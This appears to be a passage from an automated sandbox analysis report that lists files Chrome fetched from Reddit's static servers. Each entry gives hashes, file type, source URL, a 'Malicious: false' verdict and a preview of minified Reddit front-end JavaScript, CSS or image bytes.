                                                  Preview:import{ah as E,ai as R}from"./shell-4994f581.js";import{P as e}from"./links-27a3f3ef.js";const o=E=>D(E)||a(E)||d(E)||M(E),s=E=>D(E)||a(E),D=E=>E===R.ModApproved,a=E=>E===R.AdminApproved,d=E=>E===R.ModRemoved||E===R.ModSpammed,M=E=>E===R.AdminRemoved||E===R.AdminSpammed;var P;!function(E){E.UNMODERATED="UNMODERATED",E.APPROVED="APPROVED",E.REMOVED="REMOVED",E.SPAM="SPAM",E.REPORTED="REPORTED",E.FILTERED="FILTERED"}(P||(P={}));const i=(E,R,e,o)=>E===P.REMOVED&&!o&&!R&&!A(E,e),m=E=>[P.REPORTED,P.FILTERED,P.UNMODERATED,P.REMOVED,P.SPAM].includes(E),A=(E,R)=>(E===P.FILTERED||R)&&E!==P.APPROVED&&E!==P.REMOVED,O=E=>[P.APPROVED,P.UNMODERATED,P.REPORTED].includes(E),t=({moderationState:E,isSpamFilteredPost:R,isRemoved:e,isPromotedPost:o})=>(A(E,R)||!e)&&!o,T=(R,o)=>(R===e.ModQueue||R===e.ModQueueAll)&&o===E.ModQueueCompactView;export{P as M,T as a,m as b,O as c,t as d,i as e,o as h,s as i,A as s};.//# sourceMappingURL=mod-verdict-9fb8e844.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):115
                                                  Entropy (8bit):5.022846681640497
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3CB3BD4365CC90B7F4F54B0DA8FED692
                                                  SHA1:D215CBB71F04F619943EED14AD3014447A3BD1EC
                                                  SHA-256:ACF6EAE1FBDDCDDD760212CA56DB57035EC314DFF5BF0E1B2D09B7E390C68DC4
                                                  SHA-512:5B648F878E0309944B19567F807C5C4204906B7F2428795953D4417867C6278B1AB5DD79A0D16B637AE990CA3667AF193AB2EB4A747ED4E93E94A711E1ED5409
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/experiences-client-js-fb05eba9.js
                                                  Preview:import"./shell-4994f581.js";import"./icon-4d9be652.js";.//# sourceMappingURL=experiences-client-js-fb05eba9.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 640 x 623, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):95698
                                                  Entropy (8bit):7.986025684340226
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6371C5025FC35393DA3D6D0CA5A3548E
                                                  SHA1:EF479217E90818DC8D049F318FC5FA3E9095610A
                                                  SHA-256:964117FD279A0687202174BF0326B7FAF12714C3050DFB85DFD20BC5802723ED
                                                  SHA-512:E160B54ADD1DA40DE91E9AAD02ABD24B060BABCCD988EE38CBF8F00294F9C7827FA4A13B594B5A0146E0EA42E7E789257372E2CB287C31E25C9D26F472D1C579
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR.......o........F....PLTE.........=..dcp...fY...ZM...nmza^p.P8c|...".......,=..URe...ggm.y........%[....$"4....]IPm........eQ2Mh.9`^.!............dUCv.ut.......QO^...hftKJY........86G'%7{z.?>M...9$~....-......[Zhy..a`m.Yy...10A..);:J.........~....*(:.1 .\J...../##-..$...^............zWL...................}.kjw2m..q....}o....3!.~^]k......rq}UTbG}.......6!U.......~..1e.!.2z%.xw.NL[......z0!....i.1[..,..n_........'....1"...HGV..}.%..........mkd.F2..*FDT.....$<.Gkk..[..?0&53DJ....9...qgF..x9,SR`YXeWVd.:%..!,c..*..@,.=r...hY.Nq.............0.CAQa..s....Ph.....DYf;$.=.....k..O4*.Tv/,(7{..J:...N>.7".-..J;'Ox...D.....-^.pd...k'..-........O..4!%Hlx...&...K>."K.%.=Ws..[G>._OSs....D...L6.VI_]W...j2$2s....Gu@m./^..WE.4 .......1....T..Mdp7t..3j.%.....=';z..`V.to............pHYs............... .IDATx...`#.u.L......`3.@........>vH...fh..^..@..?......-.,9....:t..X.C1U.....l..c.N#.A.V.J.&..u.Z9M.v..sg."..ZiW....`..}|.;......vj..0u......l.6....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1729)
                                                  Category:downloaded
                                                  Size (bytes):1777
                                                  Entropy (8bit):4.91762100493308
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:54803256688635059D9EA57131151B75
                                                  SHA1:0E25FD4160FDAF8FB72AE42E31306C683CCB3EF9
                                                  SHA-256:83262CACA26C139C72F86B4AE669018C92CA6E563BA9107E25FF2F0950CCD239
                                                  SHA-512:84A0310EF8A9F03F343D7E16228C4A622484FD2A3B5747CBDC25C4668CB68A51A7F90E042218255D19FB822E4A934602529054BB3937D0F8E1187067F0BE12EB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/v2-events-f704ab2d.js
                                                  Preview:import{G as e}from"./shell-4994f581.js";const r="devplatform",a=e=>({source:r,action:e.action,noun:e.noun,devplatform_custom_post_info:{post_id:e.postId,subreddit_id:e.subredditId,block_type:e.blockType,presentation_context:e.pageType?s(e.pageType):"",feed_type:e.pageType?t(e.pageType):"",watermark:e.watermark},devplatform:{runtime:"web",installation_id:e.appInstallationId,app_id:e.appId,app_slug:e.appSlug,app_name:e.appSlug,app_version_number:e.appVersionNumber,public_api_version:e.appPublicApiVersion},request:{user_agent:e.userAgent}}),s=r=>{switch(r){case e.PostDetail:return"pdp";case e.Profile:return"profile";case e.Community:return"subreddit";case e.Embed:return"embed";case e.Home:case e.Popular:case e.All:case e.CustomFeed:case e.UserPosts:case e.ModQueue:case e.ModQueueAll:case e.SearchResults:case e.MFeed:return"feed";default:return""}};var u;!function(e){e.all="all",e.arena="arena",e.conversation="conversation",e.custom="custom",e.embed="embed",e.home="home",e.mature="mature",
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1267)
                                                  Category:downloaded
                                                  Size (bytes):1326
                                                  Entropy (8bit):5.192681892128793
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:944DEEDFDF3557973A2DC9533C1E3B41
                                                  SHA1:E85A03B064F65FC9F4631DBC4317605AD78E413A
                                                  SHA-256:697B501288AE21F25E614926879F05BDF6FC8369ED7EFDDBF06EB05F30E5EA6F
                                                  SHA-512:FA35CCBEA5DFE8E5559EE9388456B427F4C8C43C4F2E4BDFE3894D950CA6CB272EAD403EB53CE50CDF3945B924A131DF6A5BC3954FD0137EF16F65B1AEECEECF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/trend-page-client-js-f8d9bc80.js
                                                  Preview:import{_ as e,g as r,n as t,e as a}from"./shell-4994f581.js";import{s,a as i,x as o}from"./icon-4d9be652.js";let l=class extends s{constructor(){super(...arguments),this.revealed=!1,this.blockRevealOnClick=!1}static get styles(){return i`.outer{background:var(--color-category-spoiler);border-radius:2px;cursor:pointer;line-height:21px;transition:background ease-out 1s;border:none;padding:0;font:inherit;color:inherit;margin-right:.25rem}.inner{opacity:0;transition:opacity ease-out 1s;margin-right:-.25rem}.revealed.outer{background:0 0}.revealed .inner{opacity:1}`}revealSpoiler(e){this.revealed||e.preventDefault(),this.revealed=!0}handleKeyPress(e){"Enter"!==e.key&&" "!==e.key||this.revealSpoiler(e)}render(){return this.blockRevealOnClick?o` <span class="outer"> <span class="inner" aria-hidden="true"> <slot></slot> </span> </span> `:o` <span class="outer${this.revealed?" revealed":""}" title="Reveal Spoiler" role="button" @click="${this.revealSpoiler}" @keypress="${this.handleKeyPress}" t
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (3390)
                                                  Category:downloaded
                                                  Size (bytes):3440
                                                  Entropy (8bit):4.91258998689725
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:869134FA6E383DB78DF40FB62E67D38D
                                                  SHA1:931DF712DD55ECF79740F4E776D3958B7583A0F9
                                                  SHA-256:9B0234FC0C715905D21C676B2174A04DAF9547D1B582611AD336D34D29E64F43
                                                  SHA-512:055F7937D39AFECF810B463469039BC6C1137E3F2A4CCE501C09A3F59FFD85258763F0CA43A2A3AC2A9BF41A6763B35C2115338E4105214241E81EE867856BD5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/translation-8ca07c16.js
                                                  Preview:import{b as n,ce as a,cf as t,G as s,cg as o}from"./shell-4994f581.js";import{d as e,f as i,p as r}from"./links-27a3f3ef.js";const c=a=>n({source:"translate_button",action:"view",noun:"survey"},a?e({fields:i(a),post:a,postIsTranslated:!0}):{}),u=(a,t)=>{let s=t?e({fields:i(t),post:t,postIsTranslated:!0}):{};return s={...s,action_info:{...s?.action_info,reason:a}},n({source:"translate_button",action:"submit",noun:"survey"},s)},l=a=>n({source:"translate_button",action:"dismiss",noun:"survey"},a?e({fields:i(a),post:a,postIsTranslated:!0}):{}),d=s=>n({source:"translate_button",action:"view",noun:"comment"},(({comment:n,post:s},o=!1)=>{const{thingId:e,parentId:i,postId:r,isCommentTranslated:c}=n,{postLanguage:u,isPostTranslated:l,subredditId:d,subredditPrefixedName:_}=s,g=o?"could not translate":c?a:t;return{comment:{id:e,parent_id:i,translation_language:n.translationLanguage,translation_state:c},post:{id:r||"",language:u,translation_language:s.translationLanguage,translation_state:l,subred
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2823)
                                                  Category:downloaded
                                                  Size (bytes):2882
                                                  Entropy (8bit):5.2256030612966144
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:28ED2BCECB2EEBA5CC4334B2FE8FC66F
                                                  SHA1:F65DB6DDF8B9E75DD3B9333B60BC5E542FD14210
                                                  SHA-256:143C38AA2CFF71C4F8AB7C146DBBBCFA2709E803A25949FEDC8AAF8F939844A1
                                                  SHA-512:5784E0F5B87E7DCCD10EA867CE8E7553E7ABA3C9744E525AB97C2865E64A9289FACE008B3E79745AE38844C4D9F51D6CA797EA955D4BD1A1C86373C9A23C96AA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-tweet-embed-40b0c344.js
                                                  Preview:import{a as t,_ as e,n as s,I as i,e as o,t as r}from"./shell-4994f581.js";import{s as a,x as n}from"./icon-4d9be652.js";import{e as l,b as d}from"./links-27a3f3ef.js";const h=t(a),c=["allow-forms","allow-orientation-lock","allow-popups","allow-popups-to-escape-sandbox","allow-presentation","allow-same-origin","allow-scripts","allow-top-navigation-by-user-activation"].join(" ");let p=class extends h{constructor(){super(...arguments),this.postId="",this.limitHeight=!1,this.onMessage=t=>{const{data:e}=t;if(!t.source||t.source!==this.iframe?.contentWindow||"tweet-measured"!==e?.action||l(e?.id36)!==this.postId)return;this.iframe.height=`${e?.height}px`,this.limitHeight&&e?.height>550?(this.renderRoot?.querySelector(`#${this.postId}-tweet-overflow`)?.classList.remove("hidden"),this?.style.setProperty("height","550px")):this?.style.setProperty("height",`${e?.height+4}px`),this.renderRoot?.querySelector(`#${this.postId}-tweet-loading-placeholder`)?.remove();const s=document.querySelector(`#$
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (782)
                                                  Category:downloaded
                                                  Size (bytes):849
                                                  Entropy (8bit):5.186086115132222
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:11789277D625D1317B028FBB62C1021F
                                                  SHA1:F65AA60930E99A41CF52266EF6456B0B7298FFD6
                                                  SHA-256:4D792F8276C710D9C8D55E708B51C1A20DC5DF916329F1C59E1123BEB3C54445
                                                  SHA-512:8B677A8E1D3AF719F2E78CF1DF7C27433D9A7BF66EB3B07EF9ECCA565040DABE1359F6953F35EBF17522BB6D41CE8FC3D8BF9E299EE3479AE4BD09047DFF3474
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-layout-event-setter-d0949dae.js
                                                  Preview:import{_ as t,n as e,e as o,E as s,z as i,B as n,C as r}from"./shell-4994f581.js";import{s as a,a as c,x as l}from"./icon-4d9be652.js";import{i as u}from"./links-27a3f3ef.js";let d=class extends a{constructor(){super(...arguments),this.country="",this.cookieDomain="",this._events=new s(this),this._onLayoutViewChange=this._events.define("layout-view-change",(t=>{const{selected:e}=t.detail;i({country:this.country,name:n,value:u(e)?"true":"false",options:{...r,domain:this.cookieDomain||void 0}})}))}static get styles(){return c`:host{display:flex;align-items:center}`}render(){return l` <slot></slot>`}};t([e({type:String})],d.prototype,"country",void 0),t([e({type:String,attribute:"cookie-domain"})],d.prototype,"cookieDomain",void 0),d=t([o("shreddit-layout-event-setter")],d);.//# sourceMappingURL=shreddit-layout-event-setter-d0949dae.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (7465)
                                                  Category:downloaded
                                                  Size (bytes):7523
                                                  Entropy (8bit):5.1105855620771194
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:68DA7D9188711227AB77C0FA5F16D2FD
                                                  SHA1:CE5EA8F4E02EFD5F7EAC79CD85FDF754C82AB318
                                                  SHA-256:F0EF377486F0D68E915588A4D12D11109D5CE71D0A7FF31B65B1B386D15FBAE0
                                                  SHA-512:7C0864CCAB85912C2189D07FCFDC4074C487AFC90FA028FDC15C3CAD3041F3DD0DE156D5DB9E20F0F674F863BA2AC503AE5BE8706BF9F62D9379FD3B73675A23
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/faceplate-hovercard-74cbfc29.js
                                                  Preview:import{a6 as e,aI as t,_ as s,n as i,am as o,g as n,e as r}from"./shell-4994f581.js";import{x as a,l as h,a as l}from"./icon-4d9be652.js";import{P as c}from"./subreddit-posting-eligibility-cf0ca862.js";import{H as u}from"./club-award-confirmation-client-js-b22d6f4f.js";import{F as d}from"./header-action-item-chat-client-js-98797a42.js";const p=new WeakSet,m=async(t,{includeShadowRoot:s=!1}={})=>{const i="faceplate-partial",o=Array.from(t.querySelectorAll(i));s&&o.push(...Array.from(t.shadowRoot?.querySelectorAll(i)??[]));return(await Promise.all(o.map((async t=>!t||p.has(t)||t.loading!==e.Programmatic?Promise.resolve(!1):(p.add(t),t.load().then((()=>!0))))))).filter(Boolean).length>0},v=e=>t=>(e(t),t);let g=class extends d{constructor(){super(...arguments),this.mouseEnterDelay=750,this.mouseLeaveDelay=500,this.closeOnTrack=!1,this.disableTouchActivation=!1,this.partialLoading=e.Action,this.label="",this.mouseOnly=!1,this.sleepAfterEscape=!1,this.enterTimeout=-1,this.leaveTimeout=-1,thi
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1453)
                                                  Category:downloaded
                                                  Size (bytes):1502
                                                  Entropy (8bit):5.135631460757703
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:ACCEC8E55EDA7731CDE6C62F498A0A1B
                                                  SHA1:24E6202FCEAE321F23DE681080E0B7300B018BB1
                                                  SHA-256:AA79A1E0BEF9F87D4A3DF573D7362911484A0ADD72CED0FDC4E12ED2CE4CCA28
                                                  SHA-512:DB7090266CAD83D5EFFF2FD948B0EDB3D816C425A137B6D72C9BC8B3080A340B3FF6E7FC13613F60DAD6ECBEFE9628A453E2FD19A45CE3784F2CE768BC8B7ADA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/ui-strings-aad5fab2.js
                                                  Preview:import{I as e,g as n}from"./icon-4d9be652.js";var a,i;!function(e){e.Regular="regular",e.Semibold="semibold"}(a||(a={})),function(e){e.Small="sm",e.Medium="md",e.Large="lg"}(i||(i={})),i.Small,e.ExtraSmall,i.Medium,e.Small,i.Large,e.Medium;const r={sm:"text-12",md:"text-14",lg:"text-16"},t={always:"underline",hover:"hover:underline",none:"no-underline hover:no-underline"},s={primary:"",secondary:"text-secondary-plain hover:text-secondary-plain-hover no-visited visited:text-secondary-plain","plain-weak":"text-secondary-plain-weak hover:text-secondary-plain-hover no-visited visited:text-secondary-plain-weak",media:"text-media-onbackground no-visited visited:text-media-onbackground",inverted:"text-inverted-secondary-plain hover:text-inverted-secondary-plain-hover no-visited visited:text-neutral-background-weak"},o=({attributes:e,children:a,fontWeight:i="regular",size:o,suppressVisitedStyle:d=!1,underline:l="hover",visited:m,appearance:u="primary",trailingIcon:c})=>{const{html:v,createElem
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 96x96, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):2604
                                                  Entropy (8bit):7.913833117942897
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4733756E7D756EF456FBA4CA57939D04
                                                  SHA1:BD39D29E5A3D6961883CBE5823FCCF3DC6C822C4
                                                  SHA-256:F1DE7A25DB8F437D035A0482756EF1F96769F74A0AE5AADF62A4CDECB56C607C
                                                  SHA-512:9ABC1507D7F337957A1DA2CDA1E7F6D24E976CE05FB2718EFB3D06A1F43C351DAF59DA1FDB4944E05C6B818CAB1492E655BDA5C19AB5D690FBCA12D1963C341A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:"https://styles.redditmedia.com/t5_2vq0w/styles/communityIcon_6f0n71jeeund1.jpg?width=96&height=96&frame=1&auto=webp&crop=96:96,smart&s=af8f886b0764af894227b5f1d0f8c947131eaad7"
                                                  Preview:RIFF$...WEBPVP8 ....0*...*`.`.>Q .D..!..vl8......hI....}..q..I.}|....k............ym.....S.G.~..]./2~....}.....o./.................z......?...=.?X?..b.w.%.T.Q.3.!1T9:..E;..R8._.1...ysK&q.$1...bpg..i.C7.W....Hc.2-F....RY.}o...a|+|....2oL.W.uhP.&.F!.t...K...Z..".K..a:....dw..v....~...m..}u.&.7..AH.mZ.......@Wp..Q...\c..+q.kh7...?...).s...G.2.9"T@!R...#......t.2,.Cq_s.W.h.I3WDj.L4...y#...;i{JR.=&.f....E`...u...2..q ..... ...[.R.z..k..N..~....N..s.;^N.{r.A~.k.W,.g.K.g........J.m.......s.hX.....W.O.7..a@.n. ....\q...tD.+..y..../.j.2.~.6H.Y4...Sh...`#........H..6.*...U...v..{..G.YWK&l..;..p...>+.h....^.....!t.,............dz,.l>v.....H.%.RC....{I..x.URq..g...v...W.Q..y....K.c.y...I...K..W^..J....E@-..T..}J...1..b.......q....a..Z.tX5+.%....~p(m..p..Qc...U..j..}E....wt...<....%~GS}..?..4Rg."Z...T.A...Z...g....o..a.h...8..w......W.P.V....@ .r$U.=8...f....koK?....L.....R..t..c....I-..!....r..|g..-^P.S.."...f..........X.-.;M..@O.9,.l.qh75C.............C.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (3478)
                                                  Category:downloaded
                                                  Size (bytes):7092
                                                  Entropy (8bit):5.117188612916634
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B0E59F5C8BBB2ADB5ED9F707486D13E3
                                                  SHA1:6CE811DDEE5DE77E46DE441E77439FD8560926EB
                                                  SHA-256:D5609D20F2D21799D1DD63D8CEDC4CE392B65C5AD9890F2D9CA13B25CBC76C34
                                                  SHA-512:84492BADC4996E048FC1AC12DEF44BC79B8337A7CF05219DEC65DAB8BA16EDDEB5429C44988A2738A8FE6A7AF2A031F6001707BAE1D56D1A0E40D60AA31AE932
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/header-action-item-chat-client-js-98797a42.js
                                                  Preview:import{_ as t,n as e,aR as o,I as i,e as a}from"./shell-4994f581.js";import{s as r,a as l,x as s}from"./icon-4d9be652.js";import{P as n}from"./subreddit-posting-eligibility-cf0ca862.js";import{H as p}from"./club-award-confirmation-client-js-b22d6f4f.js";let c=class extends r{constructor(){super(...arguments),this.position="bottom",this.mouseEnterDelay=750,this.triggerEvent="hover",this.appearance="neutral",this.emitter=p(this),this._timeoutID=null,this._popperController=new n(this,{position:this.position,variantFlipOrder:{start:"s",middle:"m",end:"e"},referenceElementKey:"referenceElement",popperElementKey:"_tooltip"}),this._eventUsedMap=new WeakMap,this.updated=t=>{t.has("position")&&this._popperController.updateOptions({position:this.position})},this.handleDocumentClick=t=>{if(!(t.target instanceof HTMLElement)||this.hidden)return;if(t.target.closest(this.tagName.toLowerCase())===this)return;this._eventUsedMap.has(t)||this.close()},this.handleEscape=t=>{"Escape"===t.key&&this.close()
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2322)
                                                  Category:downloaded
                                                  Size (bytes):2387
                                                  Entropy (8bit):5.112091000833343
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:33318DFFC87A313C1A6F0E00F66F3DEE
                                                  SHA1:CD1D22AA4CF9E22E79BED884B3C8F4CBE0392043
                                                  SHA-256:49AFAA1B0AE50C8666158E7E167A71CEEAAF7B72676E11D5DC557EF57FE8A541
                                                  SHA-512:CB845C5F8C7AA4B2D1015EE499AF64D799920AD2460CBA10567C78422F56BC2D94E20C1B59386AF3E1B13724992FA1964B7B2BCB37EF618F0DFA5587EF958CE5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-post-share-button-db45bf1d.js
                                                  Preview:import{a as t,_ as e,n as s,e as i,v as a,aP as o,t as r}from"./shell-4994f581.js";import{s as n}from"./icon-4d9be652.js";import{L as h}from"./expandable-section-header-e3f969c2.js";import{W as u,S as p}from"./with-share-687454db.js";const l=u(t(n));let d=class extends l{constructor(){super(...arguments),this.shareButtonText="",this.permalink="",this.size=a.Medium,this.menuSize=h.Medium,this.buttonClass="",this.isDesktopViewport=!1,this.appearance="secondary",this.shareMenuFeatureName=o,this.shareMenuTemplateId=p,this.useButton=!1,this.useMenu=!1,this.showFullButtons=!1,this.translationLanguage=""}static get styles(){return[r]}handlePostShareClick(t){this.isAllowedEvent(t)&&(this.isDesktopViewport?this.handleDesktopShareClick(t):this.handleMobileShareClick(t))}render(){return this.useMenu?this.renderOnlyShareMenuItem({handleShareClick:this.handlePostShareClick,menuSize:this.menuSize,attributes:{className:this.buttonClass}}):this.useButton?this.renderOnlyShareButton({handleShareClick:th
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (10177)
                                                  Category:downloaded
                                                  Size (bytes):10238
                                                  Entropy (8bit):5.222017449494417
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:B7034085CAD3E77634563F82C8E14905
                                                  SHA1:FD0DE8695A73EC6561B9E15858D9D8AE9AC26CCE
                                                  SHA-256:C25D5AA423073AB81B0194FD1D6E20540F4A9ED2C4D161F7C6DEC15E5DACB2D1
                                                  SHA-512:7FAAA4B295784B257EB66617788FF658C8900F609AE43885F66AB43DB82A7B9CD15C7EA903B409AA845A5B58D0417B9D2EC4D2A53B2D38A1040D8B7E845CA391
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-sort-dropdown-bef85a78.js
                                                  Preview:import{b as e,a as t,_ as s,g as r,u as o,v as i,t as n,c as a,I as l,n as d,e as c,f6 as p,K as u,O as h,G as m,H as g}from"./shell-4994f581.js";import"./faceplate-dropdown-menu-f991e0ba.js";import"./select-controller-fa3db659.js";import"./header-action-item-chat-client-js-98797a42.js";import{s as S,N as b,I as y,x as v,l as f,ct as w,cu as I,cv as T,cw as D,cx as O,cy as C,$ as k,cz as E}from"./icon-4d9be652.js";import{v as x}from"./club-award-confirmation-client-js-b22d6f4f.js";import{l as $}from"./expandable-section-header-e3f969c2.js";import"./subreddit-posting-eligibility-cf0ca862.js";const A=t(S);var N,L;!function(e){e.ICON="icon",e.TEXT="text",e.ICON_AND_TEXT="icon_and_text"}(N||(N={}));class _ extends A{constructor(){super(...arguments),this.withoutTooltip=!1,this.dropdownHeaderText="",this.selectedItemDisplayType=N.TEXT,this.disabled=!1,this.isEntityFilterEnabled=!1,this.isDropdownOpen=!1,this.onDropdownClose=()=>{this.isDropdownOpen=!1,this.tooltip?.close?.()},this.onDropdow
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):103
                                                  Entropy (8bit):4.534823402293821
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4D14C70F9ED48C6BA2DE5CD9679CA004
                                                  SHA1:D69C185ADA72248240668084F6BC330CC75CA27A
                                                  SHA-256:52F69DB82074A17E341AF9E0757EC61793A1BD4D8EE1E34FD7007BBBDBFA447B
                                                  SHA-512:3E1EF9BCD1B500EEE70776C08E63FCE33FF1A4A7E2B817B888BB75ABD0D56AA49C5D1BBDC8DE4833165559CE4708DDCC475CC249DFB46D400F88763480736FA5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/google-one-tap-client-css-b9e7aa9d.css
                                                  Preview:iframe#credential_picker_iframe{color-scheme:auto;margin-bottom:unset;z-index:9998;pointer-events:auto}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):1712
                                                  Entropy (8bit):7.8352473444231
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:68322DBDC1EF0596B34386EC78CFC49A
                                                  SHA1:F021FFB40926FBBBC73654FA98405ADCF4A9C5B6
                                                  SHA-256:51A836AAEFF688AB4D249D5DFF5F2F489837D4103B3218C16780A89F59858C0C
                                                  SHA-512:3854CCD85097C985A4E9AA4842131CA563ABC3433FAB27D7AFFED67CE07B46539E1BA53FADBB46F287F7518B5A09D1867A938977286E126FAFD4B98FA2C3B7D6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...0...0.....`.......PLTE.........)))...DEE...]]]..............................IJJ..._``. ...}~~.................$$$111........................................455...[\\444..............bbb............"""......yzz>>>...RRR................nnn...222............TTT#$$-..?@@344.....+,,............wxxqrr...%&&...UVVXYY.........vww...............~.............555.....................ghh...EFF...666kll......DDD...122.........{||...HHH.....................uvv......===.............tuu.........oppijj............................000............ooo011...[[[PQQ........................dee.......bcc......qqq.........iii...lmm|}}......wyy999!!!...333TUU......Z[[...xyy......---...```.........stt........................ppp..............pqq'''...............<==......GGG...V.u.....pHYs................bIDATx..itSE....sCPA.....C..*.j..`(U6Kc.1...YE!........N-...b.......C....,Q.8.9.x.'..O.9......$..y....;...<q..."2.I..x%......[K...yEY5u..Hn.....`\...k..M.o~V.....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text
                                                  Category:downloaded
                                                  Size (bytes):130
                                                  Entropy (8bit):4.996132313628886
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F2367BCB2D8DEFC9B64F5ED3E2BEB8C7
                                                  SHA1:1806DB66B60EDE9DAAAAFC02E23FCBD2118CEB95
                                                  SHA-256:0249B5161014607DBF31D81BCE522EE577A71A8ECC40412E2787312E122A4294
                                                  SHA-512:54973983D732B718C5C59335F2F979B1166FEB9E5EE3B0DF9252ABD636BC00837893AD12C511BE24BABFC4382FC66A1A91E82E58094AC7B2606D8BA1C149439F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/left-nav-resources-section-client-js-fb05eba9.js
                                                  Preview:import"./shell-4994f581.js";import"./icon-4d9be652.js";.//# sourceMappingURL=left-nav-resources-section-client-js-fb05eba9.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x800, Suserng: [none]x[none], YUV color, decoders should clamp
                                                  Category:downloaded
                                                  Size (bytes):16194
                                                  Entropy (8bit):7.978428413809612
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4094C021AC84CE10EAC505509EAB3E6E
                                                  SHA1:32933A2B98E0791B6651CD301C014701BE34CF88
                                                  SHA-256:6741FDFA3B9A3D96E3C8F0F86CC874CD91F1D13756894BFF98CB1A1419B21432
                                                  SHA-512:4BD828EC0DBB9B2B66DDB4FF972821D51086A9DBDEC22C2E34E70DD85A33EBDEA38FFA59E2CC5DA02B81D7D00C391445586C65D2B05A25D20062662F613B41ED
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://external-preview.redd.it/dP5fFEO6XTK_bmmHMeUdZSBYh5mT42xU5DThZ2ugVd0.png?width=640&crop=smart&format=pjpg&auto=webp&s=718bb239cfaaa5b6a857036355cbf36e06007608
